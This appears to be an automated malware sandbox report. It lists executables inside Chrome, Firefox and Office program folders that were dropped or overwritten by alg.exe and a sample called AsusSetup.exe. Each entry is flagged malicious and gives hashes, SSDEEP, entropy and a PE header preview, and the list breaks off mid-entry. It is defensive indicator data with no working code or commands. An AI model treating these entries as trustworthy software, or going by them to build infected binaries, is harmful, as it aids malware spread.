                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1DC5200692EB08B84045600D411654985D999BF0EE64F7585D392C8B9746BB0EEA275E4082D98EC40FB7DAC3E109760A1A2102BD156F6FB2F3EC2B77341CB427
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................,.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7840197941349025
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:o83pZ3kd0CuEeN0LUmRXzYs65mnLNiXicJFFRGNzj3:kKuUQY15M7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B45D132B56137C1DE2375477F45BD2B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:1F07D72E7A2BAD9E3B660DDC1B5A952113EABE9C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AE23CBD575E55798835279BFFC2D603F7F84CB04092FCC35FC17AEF048871183
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:081746E5D90B1C6D752F2F13333A7E0BFE64A605283463A502F5A744D2CB778EB2ADD831F428A24F992FFA67047CB580D9F72C5F0E410DDCFECAA94542E4C8AD
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......N"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6689845076456455
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:1Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mr:jA4oGlcR+glEdOPKzgVZ17wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ACA2C209CD9F56090E1ED8E19F7F3057
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:1F24708F483095B73C4014E49CA929B0DD2A6D1F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:FD1238579344DACC2D0528BFD0D3B2726DB85E84B23B49B1C653F9E9D7C97504
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7D72849D95BDC4F1E62D4DB1E165BED2F28CFB846991136BD61E0AF3BE22C90BF38BC7106066A6F5BA256E5E86423FB62F39030D177459D89A9C3358642709E7
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......PL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.828099811403021
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:V8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKI:Qv2gM+qwXLg7pPgw/DSZH37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8C84AE61AE726B521C6DE04A37CFAFB7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:EBFCEBE748D3428BD662748EA9DCEB3F4C92112B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F1CF6C910BFE4A1E3FBADED02DFF2302A996828D76DBC797A6B5FC379CC9C0A4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C487D3186D830031465EBAC6958C3FBAB6A4BE0CA9D2A7E700DD71CC7439610D156F1565A8FE5A4210D38A1A3DB269669A4E9ABEA3E1EBE8B6CB4056F797F1F2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......>K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.828098691417954
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:58ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKI:Uv2gM+qwXLg7pPgw/DSZH37wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:076312A2DC15FFB5870041BBEBE274B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:804B928033F90F30AAAD87C90BFEC70DA4DE49F4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9629FAD6638ADD9279A769600A1DB33D21E1B9F881BC376249D01678BA710D57
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:CCA608190E1E58669593BE5C2771FEA7B07E544C2BDCC9496827742FEE4D746BC9225008E778A7CF73099A03AFED2C607F9CA37D8B03120C4F28E6C0F0E4CF1D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9491268970314195
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:7tjqL8fH+8aUbp8D/8+xyWAE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BjKK+81FI/8zqLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:479E686A0D32EE98BA4D6DA0ACA66AC0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:86C648EDAEC9B9D8DB7873A1948354A153034493
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1A334647EC15BF11FBDC67E160CC6AA29D558C311519B0C4030C4186D34BB30C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A1998603EBC6D1603F74D5C5B46F0F9C05C7B24078955AC4F2A998E8A394B863E9FBF59E05213BAC5943ABE50E8FEBCB215C0D6E8BA0165B064857157737318A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......|!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.028781188229773
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bAMsOu3JfCIGnZuTodRFYKBrFDbWpsLNiXicJFFRGNzj3:bAMa38ZuTSV7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2308451F7004084FFEB4AC1E74DD50A7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:D51C502AC7CCDF5C81E32FACAF4C19934E4BE9AC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BF395AD38EE17A75FF70472BD3591FC68989FB167577B93C311DC502BB71BD88
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:9FD9F6199B84F858BB06B745222EE0C9A1070386D94C489D75AC29E021E073DFFA043F98F20698CE0ABBC1F1E5472CBE6756F6297A4E97778640D0EE892F6D87
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.099941765255825
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:WSK7Fhslq2EPfOGEpLNiXicJFFRGNzj3:bo2cOp7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E7CCD5DB1563CA3935109E6BA9A42C8C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F0070E5020E77E28AE07D8B33DBE167828757082
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:54606866EA29B1A7E9B8831CB49BED1EA38EEE3004355149088CE62981ADFAF0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:CC816A8B284898899E5472D2ED50FAF3B26DFAE6A96B08662BD1169AED05EF0AC1DD208CD7809CF3625D1BBEF627AD925035B846FFD8C5FFCB651438E8BC6C5E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................g[.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.153149455903381
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Pv7e0j31mD+/wDGbjLNiXicJFFRGNzj3:nDj1mkj7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E4480408B3F600819AD8BCC53FD44DBB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:88EA3A06DCAB457727043CDAF89A5C883258E19E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C37EFDF2DD4E3C652F0D7791804C513092516EED4BEAE84FEBF422A9DAC1FD57
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4D3F6D9336BE5C35E5029061973AC58BE40C93AE776F663FCF47B9E5978EA423A2F3226A78172680A036A4A169AF4494DBC8441D71DDD9CE3D98DB40119364D0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@....................................t..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1533952
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9367341472557005
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a6hSn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:alLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:591D24D4303BE55FF8DACCAAFAE10936
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:D476677BD3E482502466858FCBFF94F4E3C0F826
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:FF75D994EC3755B426166195EDDD7C067DAA6AE1A5631DDD98B79279FFF426FC
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:5E73D90333305BE10F0FF342C90A038A616A6C10F57A77E53DA4DE6FD9B38BA289A8E9C0325A514AC15649B45AA6C13EF40A2624E8ABEA248916D4A91879B51D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."......].... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.216785417433258
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:fsFfc1VyFn5UQn652bO4Hg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:fsFcIn5rJOLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B16924AF8BC8D17257EC7700DE937375
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:6E4BA30552BD2B7D0FA547BF22FA77D97477A0B5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1B5954F5FFFC99C5C796705DFF08ED35B12487C8FD409A397B3ADDF4ABAD0B44
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6A60C4D8EB6FC0AE2347B663A9CBC600A7C6925BFC97C7B8FEF5AA879ABB70AEDD52AE70035E5E2334FC9B245BFA33365FB6F47AC8A1A064D2B0476832856070
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.4881079064592155
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:jt9o6p4xQbiKI69wpemIwpel97/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jt9faQbtl2peapelBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:85241E3070BDA379F8D81E283D8440AE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C04294A925FB3A019177314F8F2C2C31D7C138CB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BF96C1C84EE634EC30A07160D9AA28D326C3B97C9A678A5487D5398E59BA8DA8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:EFC3B6037BF804D18A2C8C22E9F157856A33F182CF80EBCC69376561043B4EFF8C66FFAA95D290F0803C6443A62DAF2EB5C84E468F20B0FE1D4A5764300C53DF
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901599586667003
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:MQVTZu0JY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DVTZuRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:267E7C429192F3C7A3E3B9823A74ABFB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:55AC59DE6CEC4B65148A64792D6CA15D85BB465D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0498A5895DC7A7FF67020AF06B9005A65D3F0D82F63D8CCCAC67CFD446BB2AC5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:CC7AAA1D23199DF549A196188B8E489A23809D16CBEF982FB2E05198AE0F4A239249A084D1CF06CAFF27E3BDA05DAF641B3C6A3D0DA5290EA60BA504FB97AC77
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`".......... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.801608975661588
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:zC1vpgXcZHze/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zC1vpIcNeLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:69658BB2F08508299FC4ADBFB7AB95C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:15A89757E91AAFDDD03847B2334D489315D45389
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E3F848A51B3F4118CFD4CF0AD17360C5CAF57AA9AD86C439D0ABFDBD356C12B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:29CB4B6597BEBE968EA17550549BF58499B7A4B2C2CE57E1552F7A96A24CF148174B1615FB96989D9CAA3AC3AEDEE56F8BBD53D4F4FDA1BA60A94A63A799588A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................BJ.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1355776
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.655507668913019
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:dcC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:LLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E3EB351CB9F9E5F6358431341D17FD6F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:CBDC523E86A452601A550AB6325BF9CC5E0293CC
